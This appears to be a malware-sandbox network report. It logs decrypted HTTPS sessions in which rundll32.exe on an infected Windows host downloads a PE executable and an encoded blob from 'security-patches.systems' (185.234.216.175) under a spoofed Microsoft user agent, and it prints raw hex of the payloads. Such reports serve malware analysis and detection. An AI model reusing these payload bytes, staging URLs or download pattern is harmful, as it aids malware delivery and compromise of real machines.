                                              2024-12-06 21:19:37 UTC1045INData Raw: 65 53 69 7a 65 53 69 7a 65 20 6f 66 20 66 69 6c 65 20 69 6e 20 62 79 74 65 73 20 28 6c 6f 6e 67 20 69 6e 74 65 67 65 72 29 2e 43 6f 6d 70 6f 6e 65 6e 74 46 6f 72 65 69 67 6e 20 6b 65 79 20 69 6e 74 6f 20 43 6f 6d 70 6f 6e 65 6e 74 20 74 61 62 6c 65 2e 53 65 71 75 65 6e 63 65 20 77 69 74 68 20 72 65 73 70 65 63 74 20 74 6f 20 74 68 65 20 6d 65 64 69 61 20 69 6d 61 67 65 73 3b 20 6f 72 64 65 72 20 6d 75 73 74 20 74 72 61 63 6b 20 63 61 62 69 6e 65 74 20 6f 72 64 65 72 2e 42 6f 6f 74 73 74 72 61 70 70 65 72 55 49 53 65 71 75 65 6e 63 65 4d 65 64 69 61 56 6f 6c 75 6d 65 4c 61 62 65 6c 54 68 65 20 6c 61 62 65 6c 20 61 74 74 72 69 62 75 74 65 64 20 74 6f 20 74 68 65 20 76 6f 6c 75 6d 65 2e 44 69 73 6b 49 64 50 72 69 6d 61 72 79 20 6b 65 79 2c 20 69 6e 74 65 67
                                              Data Ascii: eSizeSize of file in bytes (long integer).ComponentForeign key into Component table.Sequence with respect to the media images; order must track cabinet order.BootstrapperUISequenceMediaVolumeLabelThe label attributed to the volume.DiskIdPrimary key, integ
                                              2024-12-06 21:19:37 UTC1369INData Raw: 65 6e 20 74 68 65 20 64 69 61 6c 6f 67 20 69 73 20 63 72 65 61 74 65 64 2e 45 72 72 6f 72 4d 65 73 73 61 67 65 54 65 6d 70 6c 61 74 65 45 72 72 6f 72 20 66 6f 72 6d 61 74 74 69 6e 67 20 74 65 6d 70 6c 61 74 65 2c 20 6f 62 74 61 69 6e 65 64 20 66 72 6f 6d 20 75 73 65 72 20 65 64 2e 20 6f 72 20 6c 6f 63 61 6c 69 7a 65 72 73 2e 46 65 61 74 75 72 65 44 69 72 65 63 74 6f 72 79 5f 44 69 72 65 63 74 6f 72 79 55 70 70 65 72 43 61 73 65 54 68 65 20 6e 61 6d 65 20 6f 66 20 74 68 65 20 44 69 72 65 63 74 6f 72 79 20 74 68 61 74 20 63 61 6e 20 62 65 20 63 6f 6e 66 69 67 75 72 65 64 20 62 79 20 74 68 65 20 55 49 2e 20 41 20 6e 6f 6e 2d 6e 75 6c 6c 20 76 61 6c 75 65 20 77 69 6c 6c 20 65 6e 61 62 6c 65 20 74 68 65 20 62 72 6f 77 73 65 20 62 75 74 74 6f 6e 2e 45 76 65 6e
                                              Data Ascii: en the dialog is created.ErrorMessageTemplateError formatting template, obtained from user ed. or localizers.FeatureDirectory_DirectoryUpperCaseThe name of the Directory that can be configured by the UI. A non-null value will enable the browse button.Even
                                              2024-12-06 21:19:37 UTC1207INData Raw: 6c 20 70 61 74 68 2c 20 73 65 74 20 65 69 74 68 65 72 20 62 79 20 74 68 65 20 41 70 70 53 65 61 72 63 68 20 61 63 74 69 6f 6e 20 6f 72 20 77 69 74 68 20 74 68 65 20 64 65 66 61 75 6c 74 20 73 65 74 74 69 6e 67 20 6f 62 74 61 69 6e 65 64 20 66 72 6f 6d 20 74 68 65 20 44 69 72 65 63 74 6f 72 79 20 74 61 62 6c 65 2e 52 65 6d 6f 74 65 20 65 78 65 63 75 74 69 6f 6e 20 6f 70 74 69 6f 6e 2c 20 6f 6e 65 20 6f 66 20 69 72 73 45 6e 75 6d 41 20 63 6f 6e 64 69 74 69 6f 6e 61 6c 20 73 74 61 74 65 6d 65 6e 74 20 74 68 61 74 20 77 69 6c 6c 20 64 69 73 61 62 6c 65 20 74 68 69 73 20 63 6f 6d 70 6f 6e 65 6e 74 20 69 66 20 74 68 65 20 73 70 65 63 69 66 69 65 64 20 63 6f 6e 64 69 74 69 6f 6e 20 65 76 61 6c 75 61 74 65 73 20 74 6f 20 74 68 65 20 27 54 72 75 65 27 20 73 74 61
                                              Data Ascii: l path, set either by the AppSearch action or with the default setting obtained from the Directory table.Remote execution option, one of irsEnumA conditional statement that will disable this component if the specified condition evaluates to the 'True' sta
                                              2024-12-06 21:19:37 UTC1369INData Raw: 72 6f 6c 20 6f 6e 20 74 68 65 20 73 61 6d 65 20 64 69 61 6c 6f 67 2e 20 54 68 69 73 20 6c 69 6e 6b 20 64 65 66 69 6e 65 73 20 74 68 65 20 74 61 62 20 6f 72 64 65 72 20 6f 66 20 74 68 65 20 63 6f 6e 74 72 6f 6c 73 2e 20 54 68 65 20 6c 69 6e 6b 73 20 68 61 76 65 20 74 6f 20 66 6f 72 6d 20 6f 6e 65 20 6f 72 20 6d 6f 72 65 20 63 79 63 6c 65 73 21 48 65 6c 70 54 68 65 20 68 65 6c 70 20 73 74 72 69 6e 67 73 20 75 73 65 64 20 77 69 74 68 20 74 68 65 20 62 75 74 74 6f 6e 2e 20 54 68 65 20 74 65 78 74 20 69 73 20 6f 70 74 69 6f 6e 61 6c 2e 20 43 6f 6e 74 72 6f 6c 43 6f 6e 64 69 74 69 6f 6e 41 20 66 6f 72 65 69 67 6e 20 6b 65 79 20 74 6f 20 74 68 65 20 44 69 61 6c 6f 67 20 74 61 62 6c 65 2c 20 6e 61 6d 65 20 6f 66 20 74 68 65 20 64 69 61 6c 6f 67 2e 43 6f 6e 74 72
                                              Data Ascii: rol on the same dialog. This link defines the tab order of the controls. The links have to form one or more cycles!HelpThe help strings used with the button. The text is optional. ControlConditionA foreign key to the Dialog table, name of the dialog.Contr


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.449731185.234.216.1754431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-06 21:19:41 UTC125OUTGET /AdminAccounts.aspx HTTP/1.1
                                              User-Agent: Microsoft-WNS/11.0
                                              Host: security-patches.systems
                                              Cache-Control: no-cache
                                              2024-12-06 21:19:42 UTC252INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:19:42 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              Last-Modified: Fri, 06 Dec 2024 08:34:45 GMT
                                              ETag: "4e000-62895e318030d"
                                              Accept-Ranges: bytes
                                              Content-Length: 319488
                                              Connection: close
                                              2024-12-06 21:19:42 UTC7940INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 80 b9 36 3d c4 d8 58 6e c4 d8 58 6e c4 d8 58 6e 17 aa 5b 6f ce d8 58 6e 17 aa 5d 6f 4c d8 58 6e 17 aa 5c 6f d0 d8 58 6e c2 59 5d 6f db d8 58 6e c2 59 5c 6f d4 d8 58 6e c2 59 5b 6f d0 d8 58 6e 17 aa 59 6f cf d8 58 6e c4 d8 59 6e b2 d8 58 6e ae 59 5d 6f c6 d8 58 6e ae 59 58 6f c5 d8 58 6e ae 59 5a 6f c5 d8 58 6e 52 69 63 68 c4 d8 58 6e 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05
                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$6=XnXnXn[oXn]oLXn\oXnY]oXnY\oXnY[oXnYoXnYnXnY]oXnYXoXnYZoXnRichXnPEL
                                              2024-12-06 21:19:42 UTC16384INData Raw: c7 45 b0 66 4c e7 ea 89 55 b4 a0 44 a1 04 10 88 45 ff c7 45 dc 22 00 00 00 8b 0d 78 a1 04 10 33 d2 89 8d 14 fd ff ff 89 95 18 fd ff ff c7 85 38 fd ff ff 6f 9d ef f4 c6 45 95 40 0f b6 05 bb a0 04 10 99 89 85 0c fd ff ff 89 95 10 fd ff ff a1 d8 a0 04 10 8b 0d dc a0 04 10 89 8d 34 fd ff ff 89 85 30 fd ff ff c6 45 83 5f 8b 15 88 a1 04 10 a1 8c a1 04 10 89 85 2c fd ff ff 89 95 28 fd ff ff 8b 0d 40 a1 04 10 89 8d 24 fd ff ff 8b 15 18 a1 04 10 89 95 20 fd ff ff a0 28 a1 04 10 88 45 96 8b 0d 68 a1 04 10 8b 15 6c a1 04 10 89 8d 04 fd ff ff 89 95 08 fd ff ff 66 0f be 05 3f a0 04 10 66 89 85 9c fe ff ff 33 c9 c7 85 fc fc ff ff 4c 99 fc 6e 89 8d 00 fd ff ff 8b 15 30 a1 04 10 a1 34 a1 04 10 89 85 1c fd ff ff 88 55 97 66 0f b6 0d bc a0 04 10 66 89 8d a0 fe ff ff 8b 15
                                              Data Ascii: EfLUDEE"x38oE@40E_,(@$ (Ehlf?f3Ln04Uff
                                              2024-12-06 21:19:42 UTC16384INData Raw: 95 cc fe ff ff 75 0c c7 85 c8 fe ff ff 01 00 00 00 eb 0a c7 85 c8 fe ff ff 00 00 00 00 0f b7 45 f0 85 c0 75 0c c7 85 c4 fe ff ff 01 00 00 00 eb 0a c7 85 c4 fe ff ff 00 00 00 00 0f b6 0d 6b a0 04 10 f7 d1 03 0d 58 a1 04 10 75 14 33 d2 c7 85 e4 fd ff ff 01 00 00 00 89 95 e8 fd ff ff eb 0b 0f 57 c0 66 0f 13 85 e4 fd ff ff 8b 85 c8 fe ff ff 0f af 85 c4 fe ff ff 99 8b f0 0f b6 45 fd 99 8b 4d bc 8b 7d c0 2b c8 1b fa 57 51 8b 95 e8 fd ff ff 52 8b 85 e4 fd ff ff 50 e8 bd 7d 02 00 33 f0 89 35 40 a1 04 10 8b 0d f8 a0 04 10 8b 35 fc a0 04 10 0f be 45 ff 05 4a 36 34 5b 99 89 8d 58 fc ff ff 89 b5 5c fc ff ff 89 85 50 fc ff ff 89 95 54 fc ff ff 8b 95 58 fc ff ff 3b 95 50 fc ff ff 75 44 8b 85 5c fc ff ff 3b 85 54 fc ff ff 75 36 8b 4d bc 8b 55 c0 89 95 a0 fa ff ff 81 c1
                                              Data Ascii: uEukXu3WfEM}+WQRP}35@5EJ64[X\PTX;PuD\;Tu6MU
                                              2024-12-06 21:19:42 UTC16384INData Raw: ff ff 75 0c c7 85 c4 fe ff ff 01 00 00 00 eb 0a c7 85 c4 fe ff ff 00 00 00 00 8b 55 d0 f7 d2 0f af 55 b4 0f be 05 92 a0 04 10 33 d0 8b 8d c8 fe ff ff 03 8d c4 fe ff ff 0f af d1 88 55 ff 83 3d 90 a1 04 10 01 0f 85 24 01 00 00 ba 01 00 00 00 66 89 15 50 a1 04 10 0f b6 45 fd f7 d0 99 8b 0d c0 a0 04 10 8b 35 c4 a0 04 10 56 51 52 50 e8 e9 3d 02 00 f7 d0 66 89 45 e4 0f b7 15 50 a1 04 10 89 95 c0 fe ff ff 83 bd c0 fe ff ff 00 74 0e 83 bd c0 fe ff ff 01 74 24 e9 a7 00 00 00 a1 04 a1 04 10 0f af 05 44 a1 04 10 8b 0d 04 a1 04 10 03 c8 89 0d 04 a1 04 10 e9 88 00 00 00 8b 15 f8 a0 04 10 a1 fc a0 04 10 89 95 c0 fa ff ff 89 85 c4 fa ff ff 8b 8d c0 fa ff ff 0b 8d c4 fa ff ff 75 0c c7 85 bc fe ff ff 01 00 00 00 eb 0a c7 85 bc fe ff ff 00 00 00 00 8b 0d d8 a0 04 10 8b 35
                                              Data Ascii: uUU3U=$fPE5VQRP=fEPtt$Du5
                                              2024-12-06 21:19:42 UTC16384INData Raw: 89 8d f8 fe ff ff ba 74 00 00 00 66 89 95 fa fe ff ff b8 63 00 00 00 66 89 85 fc fe ff ff b9 68 00 00 00 66 89 8d fe fe ff ff ba 65 00 00 00 66 89 95 00 ff ff ff b8 73 00 00 00 66 89 85 02 ff ff ff b9 2e 00 00 00 66 89 8d 04 ff ff ff ba 73 00 00 00 66 89 95 06 ff ff ff b8 79 00 00 00 66 89 85 08 ff ff ff b9 73 00 00 00 66 89 8d 0a ff ff ff ba 74 00 00 00 66 89 95 0c ff ff ff b8 65 00 00 00 66 89 85 0e ff ff ff b9 6d 00 00 00 66 89 8d 10 ff ff ff ba 73 00 00 00 66 89 95 12 ff ff ff b8 2f 00 00 00 66 89 85 14 ff ff ff b9 76 00 00 00 66 89 8d 16 ff ff ff ba 65 00 00 00 66 89 95 18 ff ff ff b8 72 00 00 00 66 89 85 1a ff ff ff b9 69 00 00 00 66 89 8d 1c ff ff ff ba 66 00 00 00 66 89 95 1e ff ff ff b8 2e 00 00 00 66 89 85 20 ff ff ff b9 61 00 00 00 66 89 8d 22
                                              Data Ascii: tfcfhfefsf.fsfyfsftfefmfsf/fvfefrfifff.f af"
                                              2024-12-06 21:19:42 UTC16384INData Raw: e0 03 33 c9 89 45 c4 89 4d c8 eb 22 8b 15 d0 a0 04 10 0b 15 d4 a0 04 10 74 14 0f b7 05 50 a1 04 10 69 c8 34 ad ca d5 66 89 0d 24 a1 04 10 eb 2b 8b 45 cc 99 03 45 bc 13 55 c0 03 45 bc 13 55 c0 89 45 bc 89 55 c0 ba ea 51 08 00 c7 05 f8 a0 04 10 20 d7 b8 e4 89 15 fc a0 04 10 8b 85 54 ff ff ff 83 c0 45 89 85 58 fa ff ff 0f b6 0d bc a0 04 10 c1 e1 06 89 4d e0 a1 5c a1 04 10 99 2d 7a 76 a7 c4 8b 55 e0 0b d0 89 55 e0 8b 85 54 ff ff ff 83 c0 20 89 85 38 fe ff ff 8b 0d e0 a0 04 10 8b 15 e4 a0 04 10 89 95 54 fa ff ff 81 e9 d7 00 00 00 89 0d 5c a1 04 10 0f b7 45 f8 0f b6 4d fe 23 c1 0f b7 55 f8 03 d0 66 89 55 f8 8b 85 38 fe ff ff 03 85 38 fe ff ff b9 fe 01 00 00 2b c8 89 8d b4 fc ff ff 33 d2 88 55 a0 68 04 01 00 00 8d 85 44 f6 ff ff 50 8d 8d fa f8 ff ff 51 8d 4d a0
                                              Data Ascii: 3EM"tPi4f$+EEUEUEUQ TEXM\-zvUUT 8T\EM#UfU88+3UhDPQM
                                              2024-12-06 21:19:42 UTC16384INData Raw: 88 a1 04 10 8b 15 8c a1 04 10 f7 d1 f7 d2 89 8d e0 fc ff ff 89 95 e4 fc ff ff 81 bd e0 fc ff ff 68 27 84 f0 75 18 81 bd e4 fc ff ff 70 c6 f4 ff 75 0c c7 85 b0 fe ff ff 01 00 00 00 eb 0a c7 85 b0 fe ff ff 00 00 00 00 8b 85 b4 fe ff ff 3b 85 b0 fe ff ff 7c 0c c7 85 ac fe ff ff 01 00 00 00 eb 0a c7 85 ac fe ff ff 00 00 00 00 8b 8d ac fe ff ff f7 d1 85 c9 74 39 8b 15 10 a1 04 10 81 c2 e2 00 00 00 a1 54 a1 04 10 03 c2 a3 54 a1 04 10 0f bf 0d 20 a1 04 10 0f bf 15 00 a1 04 10 2b ca 0f bf 05 20 a1 04 10 03 c1 66 a3 20 a1 04 10 eb 26 0f bf 4d f0 85 c9 74 1e 0f bf 15 20 a1 04 10 81 f2 28 f9 00 00 66 89 15 00 a1 04 10 a0 78 ac 04 10 a2 bc a0 04 10 8b 4d 98 51 6a 00 ff 15 44 b0 03 10 50 ff 15 3c b0 03 10 89 45 94 33 d2 c7 05 f8 a0 04 10 e0 1a c3 4f 89 15 fc a0 04 10
                                              Data Ascii: h'upu;|t9TT + f &Mt (fxMQjDP<E3O
                                              2024-12-06 21:19:43 UTC16384INData Raw: f5 ff ff 38 00 00 00 0f b6 05 6b a0 04 10 99 89 85 5c f4 ff ff 89 95 60 f4 ff ff c7 85 84 f4 ff ff 44 fc 96 51 c7 85 88 f4 ff ff ba 21 a8 0b 8b 0d 90 a1 04 10 66 89 8d 2c fb ff ff 0f b6 05 6b a0 04 10 99 89 85 54 f4 ff ff 89 95 58 f4 ff ff c7 85 90 f4 ff ff c9 e8 4c 74 8b 15 4c a1 04 10 89 95 94 f4 ff ff c7 85 98 f4 ff ff be aa 47 50 c7 85 9c f4 ff ff a9 00 00 00 66 a1 20 a1 04 10 88 85 e2 fe ff ff c6 85 e3 fe ff ff 80 c7 85 a0 f4 ff ff e0 c4 df 6c b9 e7 8b ff ff 66 89 8d 28 fb ff ff 0f b6 55 fa 69 c2 c1 f1 bd 3b 89 45 a4 8b 0d 04 a1 04 10 2b 4d b0 8b 15 04 a1 04 10 2b d1 89 15 04 a1 04 10 a1 78 ac 04 10 89 85 d8 fe ff ff c7 85 dc fe ff ff 00 00 00 00 eb 0f 8b 8d dc fe ff ff 83 c1 01 89 8d dc fe ff ff 83 bd dc fe ff ff 63 0f 8d 4f 01 00 00 83 3d 4c a1 04
                                              Data Ascii: 8k\`DQ!f,kTXLtLGPf lf(Ui;E+M+xcO=L
                                              2024-12-06 21:19:43 UTC16384INData Raw: 55 c0 52 e8 54 fe 00 00 a2 bb a0 04 10 0f be 05 17 a0 04 10 89 85 44 fd ff ff 83 bd 44 fd ff ff 04 0f 87 a2 00 00 00 8b 8d 44 fd ff ff ff 24 8d b0 1d 02 10 8a 15 78 ac 04 10 88 15 56 a0 04 10 a1 5c a1 04 10 99 05 92 2e c4 3a 81 d2 79 3c 0a 00 33 c9 03 05 7c a1 04 10 13 d1 a3 d0 a0 04 10 89 15 d4 a0 04 10 eb 61 0f b6 45 fe 99 a3 30 a1 04 10 89 15 34 a1 04 10 8b 55 98 2b 55 d8 8b 45 9c 1b 45 dc 89 55 98 89 45 9c eb 3d 8b 4d d0 8b 55 d4 a1 64 a1 04 10 2b 0d 60 a1 04 10 1b d0 89 4d d0 89 55 d4 eb 22 0f b6 0d 6b a0 04 10 0f be 15 17 a0 04 10 0f af ca 88 4d ff eb 0c 33 c0 c7 45 d8 a4 50 00 00 89 45 dc c7 85 28 ff ff ff 00 00 00 00 eb 0f 8b 8d 28 ff ff ff 83 c1 02 89 8d 28 ff ff ff 81 bd 28 ff ff ff f5 01 00 00 0f 8d 89 00 00 00 0f b6 55 fa 0f be 05 17 a0 04 10
                                              Data Ascii: URTDDD$xV\.:y<3|aE04U+UEEUE=MUd+`MU"kM3EPE((((U
                                              2024-12-06 21:19:43 UTC16384INData Raw: ff ff 3b 4d c0 77 19 72 0b 8b 95 58 fe ff ff 3b 55 bc 77 0c c7 85 e4 fe ff ff 01 00 00 00 eb 0a c7 85 e4 fe ff ff 00 00 00 00 8b 85 e8 fe ff ff f7 d0 3b 85 e4 fe ff ff 74 0c c7 85 d4 fe ff ff 01 00 00 00 eb 0a c7 85 d4 fe ff ff 00 00 00 00 8b 8d dc fe ff ff f7 d1 0f af 8d d8 fe ff ff 8b 95 d4 fe ff ff f7 d2 3b ca 7c 39 0f b7 05 cc a0 04 10 8b 0d 28 a1 04 10 2b c8 89 0d 28 a1 04 10 8b 15 58 a1 04 10 33 c0 8b 0d f8 a0 04 10 8b 35 fc a0 04 10 56 51 50 52 e8 bf bd 00 00 a3 58 a1 04 10 eb 15 8b 55 b4 8b 45 b8 89 85 d4 fd ff ff 81 f2 3d 28 95 df 89 55 a8 e9 84 00 00 00 0f b7 4d ec 85 c9 75 0c c7 85 50 ff ff ff 01 00 00 00 eb 0a c7 85 50 ff ff ff 00 00 00 00 8b 15 04 a1 04 10 03 95 50 ff ff ff 33 c0 89 15 c0 a0 04 10 a3 c4 a0 04 10 8b 0d 54 a1 04 10 33 d2 8b 45
                                              Data Ascii: ;MwrX;Uw;t;|9(+(X35VQPRXUE=(UMuPPP3T3E


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.449732185.234.216.1754431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-06 21:19:44 UTC117OUTGET /verif.aspx HTTP/1.1
                                              User-Agent: Microsoft-WNS/11.0
                                              Host: security-patches.systems
                                              Cache-Control: no-cache
                                              2024-12-06 21:19:45 UTC252INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:19:45 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              Last-Modified: Sat, 23 Nov 2024 15:29:11 GMT
                                              ETag: "d75c4-62796294faafa"
                                              Accept-Ranges: bytes
                                              Content-Length: 882116
                                              Connection: close
                                              2024-12-06 21:19:45 UTC7940INData Raw: 4c 32 6e 42 59 56 5a 4b 4e 33 68 6d 4d 31 46 68 71 72 55 33 65 4e 6f 7a 55 57 46 56 53 6a 64 34 49 6a 4e 52 59 56 56 4b 4e 33 68 69 4d 31 46 68 56 55 6f 33 65 47 49 7a 55 57 46 56 53 6a 64 34 0d 0a 59 6a 4e 52 59 56 56 4b 4e 33 68 69 4d 31 46 68 58 55 73 33 65 47 77 73 36 32 39 56 2f 6a 36 31 51 34 74 51 4c 5a 68 72 59 78 41 4c 51 48 45 52 4a 79 56 51 43 67 4e 65 63 51 49 30 4a 46 6b 58 0d 0a 46 68 4d 7a 42 48 55 34 51 68 5a 43 57 6a 39 42 45 51 56 6b 57 41 39 63 4e 51 52 37 52 7a 70 79 52 6a 4e 52 59 56 56 4b 4e 33 68 48 2f 76 68 4f 4e 4f 62 77 42 41 4f 66 6c 68 30 30 35 76 41 45 0d 0a 30 4f 32 56 48 44 2f 6d 38 41 54 51 37 5a 4d 63 6c 65 62 77 42 41 55 65 6b 68 77 6b 35 76 41 45 42 52 36 56 48 43 48 6d 38 41 54 51 37 5a 49 63 49 75 62 77 42 41 55 65 6b
                                              Data Ascii: L2nBYVZKN3hmM1FhqrU3eNozUWFVSjd4IjNRYVVKN3hiM1FhVUo3eGIzUWFVSjd4YjNRYVVKN3hiM1FhXUs3eGws629V/j61Q4tQLZhrYxALQHERJyVQCgNecQI0JFkXFhMzBHU4QhZCWj9BEQVkWA9cNQR7RzpyRjNRYVVKN3hH/vhONObwBAOflh005vAE0O2VHD/m8ATQ7ZMclebwBAUekhwk5vAEBR6VHCHm8ATQ7ZIcIubwBAUek
                                              2024-12-06 21:19:45 UTC16384INData Raw: 2b 36 59 2f 32 69 79 70 6f 6c 46 35 59 54 50 61 4a 4b 6e 42 30 69 57 67 4e 31 47 74 6d 59 62 37 74 4b 37 2f 6e 61 32 5a 68 76 75 30 0d 0a 4e 37 69 39 34 72 6c 69 76 6a 57 65 41 4a 48 71 47 4c 61 2b 65 65 74 79 56 65 67 55 51 72 77 74 6e 76 51 54 5a 56 52 4b 4e 33 6a 70 64 71 32 6d 46 55 49 32 65 47 49 7a 32 69 79 70 6a 54 61 63 0d 0a 38 54 74 42 36 67 42 47 76 69 32 4b 75 42 52 70 33 41 2f 54 38 79 2f 50 30 71 42 5a 77 33 71 55 36 57 61 39 36 41 43 79 76 44 32 4b 75 68 53 42 33 67 66 54 38 53 2f 76 32 6a 53 31 77 54 58 78 0d 0a 4a 2b 76 61 4c 49 6e 42 4a 76 45 33 78 39 6f 6b 72 59 30 33 2f 42 51 37 51 65 6f 59 73 76 42 35 69 6b 56 5a 63 64 34 66 7a 2f 4d 6e 78 39 67 6a 55 63 6c 4b 6a 47 4a 47 57 4b 59 51 75 6a 64 34 0d 0a 59 6a 4f 36 61 4e 34 48 77 33 73
                                              Data Ascii: +6Y/2iypolF5YTPaJKnB0iWgN1GtmYb7tK7/na2Zhvu0N7i94rlivjWeAJHqGLa+eetyVegUQrwtnvQTZVRKN3jpdq2mFUI2eGIz2iypjTac8TtB6gBGvi2KuBRp3A/T8y/P0qBZw3qU6Wa96ACyvD2KuhSB3gfT8S/v2jS1wTXxJ+vaLInBJvE3x9okrY03/BQ7QeoYsvB5ikVZcd4fz/Mnx9gjUclKjGJGWKYQujd4YjO6aN4Hw3s
                                              2024-12-06 21:19:45 UTC16384INData Raw: 36 51 43 30 4f 4d 34 6e 7a 64 53 68 49 52 48 77 50 62 6f 7a 55 57 46 56 77 58 70 6f 0d 0a 36 33 36 39 36 67 42 47 76 69 32 53 75 42 53 52 33 41 2f 37 38 79 2f 66 32 43 79 46 78 32 4b 30 36 32 61 78 70 68 43 65 4e 33 68 69 4d 39 6f 6b 64 63 4e 79 6e 4f 6c 2b 54 65 67 59 6f 72 77 74 0d 0a 69 72 6f 45 70 64 34 50 30 2f 45 6e 2b 39 77 73 6b 63 4e 36 70 4f 6c 6d 73 54 50 65 42 2b 75 51 52 67 35 51 59 62 78 64 79 49 65 64 75 42 52 70 33 67 63 72 38 7a 63 54 32 47 6e 63 47 6a 50 7a 0d 0a 4a 7a 76 61 68 41 69 4a 2b 37 53 75 2f 35 32 74 6d 59 62 37 74 44 65 34 76 54 79 57 68 76 75 30 72 76 2b 64 72 5a 6d 47 2b 37 51 33 75 4c 30 77 76 6b 4f 38 50 57 71 77 6b 58 48 63 44 7a 2f 7a 0d 0a 4c 7a 74 71 4c 46 6b 2b 41 50 4d 33 4f 39 67 30 71 63 46 36 68 49 6f 59 67 32 4e
                                              Data Ascii: 6QC0OM4nzdShIRHwPbozUWFVwXpo63696gBGvi2SuBSR3A/78y/f2CyFx2K062axphCeN3hiM9okdcNynOl+TegYorwtiroEpd4P0/En+9wskcN6pOlmsTPeB+uQRg5QYbxdyIeduBRp3gcr8zcT2GncGjPzJzvahAiJ+7Su/52tmYb7tDe4vTyWhvu0rv+drZmG+7Q3uL0wvkO8PWqwkXHcDz/zLztqLFk+APM3O9g0qcF6hIoYg2N
                                              2024-12-06 21:19:45 UTC16384INData Raw: 61 4f 75 6d 51 5a 36 71 74 62 37 39 0d 0a 64 73 79 75 6e 72 35 44 76 44 58 36 73 4c 68 67 33 41 65 76 2b 78 2b 72 55 52 64 4c 78 36 4a 6f 6e 63 79 75 36 4d 44 36 79 59 65 64 50 4f 63 6b 54 52 71 38 39 64 4c 4e 72 70 36 39 64 53 5a 35 0d 0a 59 74 69 43 36 74 68 61 79 49 65 64 75 4d 52 31 71 72 58 49 38 65 39 37 72 35 36 71 77 36 49 30 6e 4d 79 75 36 74 41 43 79 59 65 64 75 4e 77 74 71 37 58 49 38 53 63 2f 32 43 78 46 6a 58 4b 67 0d 0a 59 6a 4e 52 59 62 79 78 4e 33 68 69 76 73 52 42 71 37 58 49 38 54 65 6e 32 69 54 42 77 37 4a 41 6e 63 79 75 36 68 6a 65 74 41 46 32 50 43 64 74 6b 73 38 4c 68 35 33 4d 55 47 46 56 53 74 78 79 0d 0a 70 62 5a 74 6e 71 71 31 4e 33 68 69 4d 39 76 30 61 62 58 49 68 2b 70 6d 75 57 37 6a 44 39 2f 39 6f 6b 64 47 36 68 6a 65 76 47 6e
                                              Data Ascii: aOumQZ6qtb79dsyunr5DvDX6sLhg3Aev+x+rURdLx6Joncyu6MD6yYedPOckTRq89dLNrp69dSZ5YtiC6thayIeduMR1qrXI8e97r56qw6I0nMyu6tACyYeduNwtq7XI8Sc/2CxFjXKgYjNRYbyxN3hivsRBq7XI8Ten2iTBw7JAncyu6hjetAF2PCdtks8Lh53MUGFVStxypbZtnqq1N3hiM9v0abXIh+pmuW7jD9/9okdG6hjevGn
                                              2024-12-06 21:19:45 UTC16384INData Raw: 67 55 74 64 35 43 76 6a 4a 6d 39 42 53 64 56 55 6f 33 65 4f 6c 6d 57 65 67 41 68 72 77 39 7a 72 6f 55 73 64 34 48 35 2f 45 76 39 39 6f 30 6d 63 4e 69 6b 4f 6c 32 75 65 67 51 67 72 77 31 0d 0a 71 72 6f 63 30 64 67 66 78 53 72 70 64 72 6b 78 33 67 66 7a 6b 49 35 4f 72 70 34 2f 53 72 6f 31 79 6d 4b 35 6b 4e 32 31 79 50 75 6d 4f 31 37 58 68 63 2f 6c 44 58 56 62 52 31 31 56 53 6c 2b 49 0d 0a 46 44 74 42 43 65 33 47 50 32 69 4b 38 32 64 6e 56 63 6e 7a 64 4b 56 32 6b 57 46 56 53 6a 66 31 4c 35 2f 59 4c 4c 48 42 59 70 7a 70 4d 64 67 6b 36 63 46 36 6e 4f 6c 6d 6b 65 68 45 77 58 4c 45 0d 0a 36 33 62 70 36 68 6a 79 76 6a 58 57 39 42 53 64 71 72 58 49 68 2b 39 2b 2b 59 6d 64 6b 7a 64 34 36 58 62 6c 36 68 69 2b 55 2f 46 76 4d 31 46 68 56 63 48 53 4a 61 48 2f 6e 61 32
                                              Data Ascii: gUtd5CvjJm9BSdVUo3eOlmWegAhrw9zroUsd4H5/Ev99o0mcNikOl2uegQgrw1qroc0dgfxSrpdrkx3gfzkI5Orp4/Sro1ymK5kN21yPumO17Xhc/lDXVbR11VSl+IFDtBCe3GP2iK82dnVcnzdKV2kWFVSjf1L5/YLLHBYpzpMdgk6cF6nOlmkehEwXLE63bp6hjyvjXW9BSdqrXIh+9++Ymdkzd46Xbl6hi+U/FvM1FhVcHSJaH/na2
